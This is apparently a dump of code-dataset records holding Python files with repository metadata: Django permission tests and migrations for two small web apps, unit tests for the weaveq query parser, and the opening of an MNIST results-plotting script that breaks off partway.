NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 37
|
2017-02-21T12:07:57.000Z
|
2022-02-23T10:45:20.000Z
|
NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 26
|
2018-09-11T00:33:21.000Z
|
2022-02-09T10:38:07.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase, Client
from django.urls import reverse
# Declaration of Username and Password
username = 'admin'
password = 'Test1234$'
def login_user(c: object, self: object) -> object:
response = c.post(
reverse('login'),
self.credentials,
follow=True,
)
self.assertTrue(response.context['user'].is_active)
class CustomerPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
def test_customer_permissions(self):
c = Client()
# User will be logged in
login_user(c, self)
# Go to an existing customer -> user should have access
response = c.get(reverse('customer_information', args=['1']))
self.assertEqual(response.status_code, 200)
def test_customer_save_permissions(self):
c = Client()
# User will be logged in
login_user(c, self)
# Send a POST request to new_customer -> user should NOT be able to save
response = c.post(
reverse('customer_information_save', args=['1']),
data={
'customer_title': 1,
'customer_first_name': 'NearBeach',
'customer_last_name': 'Support',
'customer_email': 'support@nearbeach.org',
'organisation': 1,
},
)
self.assertEqual(response.status_code, 200)
def test_new_customer_permission(self):
c = Client()
# user will be logged in
login_user(c, self)
# Go to create a new customer -> user should NOT have access
response = c.get(reverse('new_customer'))
self.assertEqual(response.status_code, 200)
class KanbanPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
def test_kanban_information(self):
c = Client()
# user will be logged in
login_user(c, self)
# Go to an existing kanban board
response = c.get(reverse('kanban_information', args=['1']))
self.assertEqual(response.status_code, 200)
# Go to an existing kanban board where user is not in group -> permission denied
response = c.get(reverse('kanban_information', args=['2']))
self.assertEqual(response.status_code, 200)
class OrganisationPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
class ProjectPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
def test_project_permissions(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can open up the project
response = c.get(reverse('project_information', args=['1']))
self.assertEqual(response.status_code, 200)
# Make sure the admin user can open up the task
response = c.get(reverse('task_information', args=['2']))
self.assertEqual(response.status_code, 200)
class RFCPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
class RequirementPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
class RequirementItemPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
class TaskPermissionTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
def test_task_permissions(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can open up the task
response = c.get(reverse('task_information', args=['1']))
self.assertEqual(response.status_code, 200)
# Make sure the admin user can open up the project
response = c.get(reverse('task_information', args=['2']))
self.assertEqual(response.status_code, 200)
class AdministrationTest(TestCase):
fixtures = ['NearBeach_basic_setup.json']
def setUp(self):
self.credentials = {
'username': username,
'password': password
}
def test_search_users(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can go to the /search/users panel
response = c.get(reverse('search_user'))
self.assertEqual(response.status_code, 200)
# Send data to the backend
response = c.post(
reverse('search_user'),
{'search': 'project'}
)
self.assertEqual(response.status_code, 200)
def test_admin_user_information(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can go to the user/1
response = c.get(reverse('user_information', args=[2]))
self.assertEqual(response.status_code, 200)
# Make sure the admin user can save information
response = c.post(
reverse('user_information_save', args=[2]),
{
'first_name': 'Team',
'last_name': 'Leader',
'email': 'support@nearbeach.org',
'is_active': True,
'is_superuser': False,
}
)
self.assertEqual(response.status_code, 200)
def test_bad_user_information_forms(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can go to the user/1
_ = c.get(reverse('user_information', args=[2]))
# The following tests will make sure the user can't submit bad forms
# Blank First name
#response = c.post(
# reverse('user_information_save', args=[2]),
# {
# 'first_name': '',
# 'last_name': 'Name',
# 'email': 'support@nearbeach.org',
# 'is_active': True,
# 'is_superuser': False,
# }
#)
#self.assertEqual(response.status_code, 400)
# Blank Lastname
#response = c.post(
# reverse('user_information_save', args=[2]),
# {
# 'first_name': 'First',
# 'last_name': '',
# 'email': 'support@nearbeach.org',
# }
#)
#self.assertEqual(response.status_code, 400)
# Blank Email
#response = c.post(
# reverse('user_information_save', args=[2]),
# {
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': '',
# }
#)
#self.assertEqual(response.status_code, 400)
# Blank Passwords
#response = c.post(
# reverse('user_information_save', args=[2]),
# {
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': 'support@nearbeach.org',
# }
#)
#self.assertEqual(response.status_code, 400)
# Blank Firstname
#response = c.post(
# reverse('user_information_save', args=[2]),
# {
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': 'support@nearbeach.org',
# }
#)
#self.assertEqual(response.status_code, 400)
def test_admin_new_user(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can go to the new_user
response = c.get(reverse('new_user'))
self.assertEqual(response.status_code, 200)
# Make sure the admin user can submit a new user
response = c.post(
reverse('new_user_save'),
{
'username': 'random_user',
'first_name': 'First',
'last_name': 'Name',
'email': 'support@nearbeach.org',
'password1': 'Test1234$',
'password2': 'Test1234$'
}
)
self.assertEqual(response.status_code, 200)
def test_bad_new_user_forms(self):
c = Client()
# User will be logged in
login_user(c, self)
# Make sure the admin user can go to the user/1
response = c.get(reverse('user_information', args=[2]))
# The following tests will make sure the user can't submit bad forms
# Blank Username
response = c.post(
reverse('new_user_save'),
{
'username': '',
'first_name': 'First',
'last_name': 'Name',
'email': 'support@nearbeach.org',
'password1': 'Test1234$',
'password2': 'Test1234$'
}
)
self.assertEqual(response.status_code, 400)
# Blank Email
#response = c.post(
# reverse('new_user_save'),
# {
# 'username': 'form_fail',
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': '',
# 'password1': 'Test1234$',
# 'password2': 'Test1234$'
# }
#)
#self.assertEqual(response.status_code, 400)
# Blank Passwords
# response = c.post(
# reverse('new_user_save'),
# {
# 'username': 'form_fail',
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': 'support@nearbeach.org',
# 'password1': '',
# 'password2': 'Test1234$'
# }
# )
# self.assertEqual(response.status_code, 400)
# # Blank Firstname
# response = c.post(
# reverse('new_user_save'),
# {
# 'username': 'form_fail',
# 'first_name': 'First',
# 'last_name': 'Name',
# 'email': 'support@nearbeach.org',
# 'password1': 'Test1234$',
# 'password2': ''
# }
# )
# self.assertEqual(response.status_code, 400)
| 28.671835
| 88
| 0.536319
| 1,117
| 11,096
| 5.182632
| 0.111907
| 0.040421
| 0.095353
| 0.120228
| 0.814821
| 0.802211
| 0.779755
| 0.75298
| 0.732078
| 0.697875
| 0
| 0.01931
| 0.346611
| 11,096
| 386
| 89
| 28.746114
| 0.779172
| 0.306236
| 0
| 0.57377
| 0
| 0
| 0.145839
| 0.048085
| 0
| 0
| 0
| 0
| 0.092896
| 1
| 0.114754
| false
| 0.076503
| 0.016393
| 0
| 0.229508
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b8b79f04fc405c8d99b96eb4edb54d9c709759ce
| 1,962
|
py
|
Python
|
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | 1
|
2021-09-12T07:09:11.000Z
|
2021-09-12T07:09:11.000Z
|
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | null | null | null |
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | 1
|
2021-09-12T07:09:12.000Z
|
2021-09-12T07:09:12.000Z
|
# Generated by Django 2.2.6 on 2020-01-18 06:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_auto_20200116_2309'),
]
operations = [
migrations.AddField(
model_name='enroll',
name='outofmid',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='sub1mark',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='sub2mark',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='sub3mark',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='sub4mark',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='sub5mark',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='enroll',
name='subject1',
field=models.TextField(max_length=15, null=True),
),
migrations.AddField(
model_name='enroll',
name='subject2',
field=models.TextField(max_length=15, null=True),
),
migrations.AddField(
model_name='enroll',
name='subject3',
field=models.TextField(max_length=15, null=True),
),
migrations.AddField(
model_name='enroll',
name='subject4',
field=models.TextField(max_length=15, null=True),
),
migrations.AddField(
model_name='enroll',
name='subject5',
field=models.TextField(max_length=15, null=True),
),
]
| 28.434783
| 61
| 0.531091
| 176
| 1,962
| 5.8125
| 0.272727
| 0.193548
| 0.247312
| 0.290323
| 0.770283
| 0.770283
| 0.734115
| 0.734115
| 0.695992
| 0.695992
| 0
| 0.039969
| 0.349643
| 1,962
| 68
| 62
| 28.852941
| 0.761755
| 0.022936
| 0
| 0.709677
| 1
| 0
| 0.094517
| 0.01201
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b218c10762089571ba112b83de4849b6cf5360b9
| 2,947
|
py
|
Python
|
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-27 15:59
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('customers', '0002_vendor'),
]
operations = [
migrations.AddField(
model_name='customer',
name='created_date',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='customer',
name='updated_date',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='vendor',
name='created_date',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='vendor',
name='updated_date',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='customer',
name='city',
field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_city', message='city should contain only alphabets', regex='^[a-zA-Z]*$')]),
),
migrations.AlterField(
model_name='customer',
name='name',
field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_name', message='name should contain only alphabets', regex='^[a-zA-Z]*$')]),
),
migrations.AlterField(
model_name='customer',
name='phone_number',
field=models.CharField(max_length=13, validators=[django.core.validators.RegexValidator(code='invalid Phone number', message='Phone number should contain only 10 numbers', regex='^[0-9]{10}$')]),
),
migrations.AlterField(
model_name='vendor',
name='city',
field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_city', message='city should contain only alphabets', regex='^[a-zA-Z]*$')]),
),
migrations.AlterField(
model_name='vendor',
name='name',
field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_name', message='name should contain only alphabets', regex='^[a-zA-Z]*$')]),
),
migrations.AlterField(
model_name='vendor',
name='phone_number',
field=models.CharField(max_length=13, validators=[django.core.validators.RegexValidator(code='invalid Phone number', message='Phone number should contain only 10 numbers', regex='^[0-9]{10}$')]),
),
]
| 42.1
| 207
| 0.623346
| 311
| 2,947
| 5.778135
| 0.237942
| 0.050083
| 0.077908
| 0.096828
| 0.869226
| 0.869226
| 0.794658
| 0.794658
| 0.794658
| 0.794658
| 0
| 0.020161
| 0.24262
| 2,947
| 69
| 208
| 42.710145
| 0.784946
| 0.023074
| 0
| 0.83871
| 1
| 0
| 0.192629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.064516
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2806b9ce183089352a1da20e11abdbcbdb705ee
| 15,800
|
py
|
Python
|
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
"""@package parser_test
Tests for weaveq.parser
"""
import unittest
from weaveq.parser import TextQuery, DataSourceBuilder
from weaveq.wqexception import TextQueryCompileError
class TestDataSource(object):
"""A data source mock that always succeeds
"""
def __init__(self, source_uri, filter_string):
self._uri = source_uri
self._filter = filter_string
def __str__(self):
"""String representation for use in assertions"""
return "<uri={0}, filter={1}>".format(self._uri, str(self._filter))
class TestDataSourceBuilder(DataSourceBuilder):
def __init__(self, fail = False):
self._fail = fail
def __call__(self, source_uri, filter_string):
if (self._fail):
return None
else:
data_source = TestDataSource(source_uri, filter_string)
return data_source
class TestTextQuery(unittest.TestCase):
"""Tests TextQuery class
"""
def test_no_process_clause(self):
"""Text query with no process clause
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1|')
def test_join(self):
"""Join clause, no options
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_multi_step_process(self):
"""Join clause, no options
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #pivot-to "source3" #as a3 #where a2.field1 = a3.field2 #pivot-to "source4" #as a4 #where a3.field2 = a4.field1')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>,<pos=2, op=PIVOT, q={2}, rels=[[field1 == field2]]>,<pos=3, op=PIVOT, q={3}, rels=[[field2 == field1]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>", "<uri=source3, filter=None>", "<uri=source4, filter=None>"))
def test_join_filter(self):
"""Join clause with filter
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_join_exclude_empty(self):
"""Join clause, exclude empty option
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #exclude-empty')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=True, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_join_array(self):
"""Join clause, array option
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #array')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=True>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_join_field_name(self):
"""Join clause, field name option
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #field-name test_name')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=test_name, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_join_all_options(self):
"""Join clause, all options
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #exclude-empty #array #field-name test_name')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=True, field_name=test_name, array=True>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_pivot(self):
"""Pivot clause
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a1.field1 = a2.field2')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_pivot_filter(self):
"""Pivot clause with filter
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_compound_expression_and(self):
"""Compound expression - 2 and'ed expressions
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and a1.field2 != a2.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_compound_expression_or(self):
"""Compound expression - 2 or'ed expressions
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_compound_expression_and_or(self):
"""Compound expression - and/or compound expression
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and a1.field2 = a2.field3 or a1.field3 = a2.field4')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field3 == field4]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_compound_expression_grouped(self):
"""Compound expression - and/or compound expression grouped by parens
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and (a1.field2 = a2.field3 or a1.field3 = a2.field4)')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field1 == field2, field3 == field4]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_compound_expression_grouped_multilevel(self):
"""Compound expression - multiple sub-expressions grouped by nested parens
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where (a1.field1 = a2.field2 and (a1.field2 = a2.field3 or (a1.field3 = a2.field4 and a1.field4 = a2.field5)))')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field1 == field2, field3 == field4, field4 == field5]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_literal_escape(self):
"""String literals escape sequences work
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "sou\\\"rce\\\\1" #as a1 #filter |filter1| #pivot-to "sou\\\"rce\\\\2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=sou\"rce\\1, filter=filter1>", "<uri=sou\"rce\\2, filter=filter2>"))
def test_filter_escape(self):
"""Filter escape sequence works
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filt\\|er1| #pivot-to "source2" #as a2 #filter |filter\\|2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filt|er1>", "<uri=source2, filter=filter|2>"))
def test_filter_optional(self):
"""Filters are optional
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #pivot-to "source2" #as a2 #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=None>", "<uri=source2, filter=None>"))
def test_valid_identifier_chars(self):
"""Identifiers can contain the full range of valid characters
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a_1t@$a? #filter |filter1| #pivot-to "source2" #as a_2t@$a? #filter |filter2| #where a_1t@$a?.field1 = a_2t@$a?.field2 or a_1t@$a?.field2 != a_2t@$a?.field3')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))
def test_malformed_relation_nolhs(self):
"""Relation with no LHS
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where = a2.field2')
def test_malformed_relation_norhs(self):
"""Relation with no RHS
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = ')
def test_malformed_relation_badop(self):
"""Relation with no an invalid comparison operator
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where : a2.field2')
def test_missing_alias(self):
"""Relation with no an invalid comparison operator
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #filter |filter2| #where a1.field1 = a2.field2')
def test_missing_where(self):
"""Relation with no an invalid comparison operator
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2|')
def test_unresolved_alias(self):
"""An invalid alias causes exception
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a3.field1 = a2.field2')
def test_ordered_alias(self):
"""Aliases can be used to express operands in any order
"""
data_source_builder = TestDataSourceBuilder()
subject = TextQuery(data_source_builder)
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a2.field2 = a1.field1')
self.assertEquals(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))
def test_failed_datasource(self):
"""Failure to create a data source causes exception
"""
data_source_builder = TestDataSourceBuilder(True)
subject = TextQuery(data_source_builder)
with self.assertRaises(TextQueryCompileError):
result = subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a2.field2 = a1.field1')
| 52.666667
| 401
| 0.657405
| 1,991
| 15,800
| 5.086389
| 0.082873
| 0.057273
| 0.090649
| 0.101313
| 0.823146
| 0.810408
| 0.793424
| 0.781179
| 0.781179
| 0.769033
| 0
| 0.041203
| 0.187405
| 15,800
| 299
| 402
| 52.842809
| 0.747566
| 0.088924
| 0
| 0.435065
| 0
| 0.292208
| 0.465721
| 0.00295
| 0
| 0
| 0
| 0
| 0.175325
| 1
| 0.201299
| false
| 0
| 0.019481
| 0
| 0.25974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b280dfca02d3dccdb48f32545932f488b253baea
| 5,375
|
py
|
Python
|
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import numpy as np
import matplotlib.pyplot as plt
import csv
from glob import glob
# MNIST
data_dirs = ["mnist_mlp_1_layer", "mnist_mlp_2_layer", "mnist_cnn_2_layer"]
colors = ["r", "g", "b", "m", "o", "c"]
c = 0
for data_dir in data_dirs:
sub_dirs = glob('./results/' + data_dir + "/*/")
binary_performance = []
nonbinary_performance = []
for sub_dir in sub_dirs:
meta = {}
with open(sub_dir + "params.txt", "r") as param_file:
for line in param_file:
key, val = line.partition("=")[::2]
meta[key.strip()] = val.strip()
alpha = int(meta["nalpha"])
accuracy = np.loadtxt(sub_dir + "performance.dat")[-1, 8]
if meta["binary"] == "True":
binary_performance.append([alpha, accuracy])
